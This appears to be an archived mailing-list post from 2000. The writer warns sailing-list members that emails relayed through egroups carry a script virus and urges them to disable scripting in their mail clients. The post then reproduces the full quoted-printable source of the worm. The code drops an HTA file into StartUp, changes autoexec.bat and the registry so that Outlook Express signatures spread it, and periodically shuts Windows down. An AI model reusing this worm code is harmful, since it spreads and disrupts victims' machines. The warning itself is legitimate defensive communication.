Virus (was Re: [alberg30] A30 article-huge file)

George Dinwiddie gdinwiddie at min.net
Fri Apr 14 18:45:23 PDT 2000 

Joe,

Your email contained the same virus that appeared in Towney's
email on the A30 list.  It shows up right above the ad banner
in the HTML source.  I'm beginning to think that perhaps it's
not your machine and Towney's machine, but egroups' server 
that's infected.

Please, everyone make sure that scripts are turned off in your
email software.  I can't imagine any reason you'd want an
email to automatically run something on your machine.

 - George


--------------script source--------------
function sErr(){return
true;}window.onerror=3DsErr;scr.Reset();scr.doc=3D"Z=
<HTML><HEAD><TITLE>Driver Memory Error</"+"TITLE><HTA:APPLICATION
ID=3D\"hO=
\" WINDOWSTATE=3DMinimize></"+"HEAD><BODY BGCOLOR=3D#CCCCCC><object
id=3D'w=
sh'
classid=3D'clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCR=
IPT>function sEr(){self.close();return
true;}window.onerror=3DsEr;fs=3Dnew =
ActiveXObject('Scripting.FileSystemObject');wd=3D'C:\\\\Windows\\\\';fl=3Df=
s.GetFolder(wd+'Applic~1\\\\Identities');sbf=3Dfl.SubFolders;for(var
mye=3D=
new
Enumerator(sbf);!mye.atEnd();mye.moveNext())idd=3Dmye.item();ids=3Dnew =
String(idd);idn=3Dids.slice(31);fic=3Didn.substring(1,9);kfr=3Dwd+'MENUD=C9=
~1\\\\PROGRA~1\\\\D=C9MARR~1\\\\kak.hta';ken=3Dwd+'STARTM~1\\\\Programs\\\\=
StartUp\\\\kak.hta';k2=3Dwd+'System\\\\'+fic+'.hta';kk=3D(fs.FileExists(kfr=
))?kfr:ken;aek=3D'C:\\\\AE.KAK';aeb=3D'C:\\\\Autoexec.bat';if(!fs.FileExist=
s(aek)){re=3D/kak.hta/i;if(hO.commandLine.search(re)!=3D-1){f1=3Dfs.GetFile=
(aeb);f1.Copy(aek);t1=3Df1.OpenAsTextStream(8);pth=3D(kk=3D=3Dkfr)?wd+'MENU=
D=90~1\\\\PROGRA~1\\\\D=90MARR~1\\\\kak.hta':ken;t1.WriteLine('@echo
off>'+=
pth);t1.WriteLine('del
'+pth);t1.Close();}}if(!fs.FileExists(k2)){fs.CopyFi=
le(kk,k2);fs.GetFile(k2).Attributes=3D2;}t2=3Dfs.CreateTextFile(wd+'kak.reg=
');t2.write('REGEDIT4');t2.WriteBlankLines(2);ky=3D'[HKEY_CURRENT_USER\\\\I=
dentities\\\\'+idn+'\\\\Software\\\\Microsoft\\\\Outlook
Express\\\\5.0';sg=
=3D'\\\\signatures';t2.WriteLine(ky+sg+']');t2.Write('\"Default
Signature\"=
=3D\"00000000\"');t2.WriteBlankLines(2);t2.WriteLine(ky+sg+'\\\\00000000]')=
;t2.WriteLine('\"name\"=3D\"Signature
#1\"');t2.WriteLine('\"type\"=3Ddword=
:00000002');t2.WriteLine('\"text\"=3D\"\"');t2.Write('\"file\"=3D\"C:\\\\\\=
\\WINDOWS\\\\\\\\kak.htm\"');t2.WriteBlankLines(2);t2.WriteLine(ky+']');t2.=
Write('\"Signature
Flags\"=3Ddword:00000003');t2.WriteBlankLines(2);t2.Writ=
eLine('[HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVe=
rsion\\\\Run]');t2.Write('\"cAg0u\"=3D\"C:\\\\\\\\WINDOWS\\\\\\\\SYSTEM\\\\=
\\\\'+fic+'.hta\"');t2.WriteBlankLines(2);t2.close();wsh.Run(wd+'Regedit.ex=
e -s
'+wd+'kak.reg');t3=3Dfs.CreateTextFile(wd+'kak.htm',1);t3.Write('<HTML=
><BODY><DIV style=3D\"POSITION:absolute;RIGHT:0px;TOP:-20px;Z-INDEX:5\"><OB=
JECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC
id=3Dscr></"+"OBJ=
ECT></"+"DIV>');t4=3Dfs.OpenTextFile(k2,1);while(t4.Read(1)!=3D'Z');t3.Writ=
eLine('<SCRIPT><!--');t3.write('function sErr(){return
true;}window.onerror=
=3DsErr;scr.Reset();scr.doc=3D\"Z');rs=3Dt4.Read(3095);t4.close();rd=3D/\\\=
\/g;re=3D/\"/g;rf=3D/<\\//g;rt=3Drs.replace(rd,'\\\\\\\\').replace(re,'\\\\=
\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=3D(navigator.systemLan=
guage)?navigator.systemLanguage:navigator.language;scr.Path=3D(la=3D=3D\"fr=
\")?\"C:\\\\\\\\windows\\\\\\\\Menu
D=E9marrer\\\\\\\\Programmes\\\\\\\\D=
=E9marrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start
Menu\\\\\\\\Pr=
ograms\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=3Dnavigator.userAgent.toLowerCas=
e();if(((agt.indexOf(\"msie\")!=3D-1)&&(parseInt(navigator.appVersion)>4))|=
|(agt.indexOf(\"msie
5.\")!=3D-1))scr.write();');t3.write('//--></"+"'+'SCR=
IPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'k=
ak.htm').Attributes=3D2;fs.DeleteFile(wd+'kak.reg');d=3Dnew
Date();if(d.get=
Date()=3D=3D1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not
today =
!');wsh.Run(wd+'RUNDLL32.EXE
user.exe,exitwindows');}self.close();</"+"SCRI=
PT>S3 driver memory alloc failed  
!]]%%%%%</"+"BODY></"+"HTML>";la=3D=
(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.=
Path=3D(la=3D=3D"fr")?"C:\\windows\\Menu
D=E9marrer\\Programmes\\D=E9marrag=
e\\kak.hta":"C:\\windows\\Start
Menu\\Programs\\StartUp\\kak.hta";agt=3Dnav=
igator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=3D-1)&&(parseInt(n=
avigator.appVersion)>4))||(agt.indexOf("msie 5.")!=3D-1))scr.write();

------------------------------------------------------------------------
You can win $1000!
Time-limited offer.  Enter today at:
http://click.egroups.com/1/2864/5/_/476031/_/955762890/
------------------------------------------------------------------------


 955763123.0

More information about the Public-List mailing list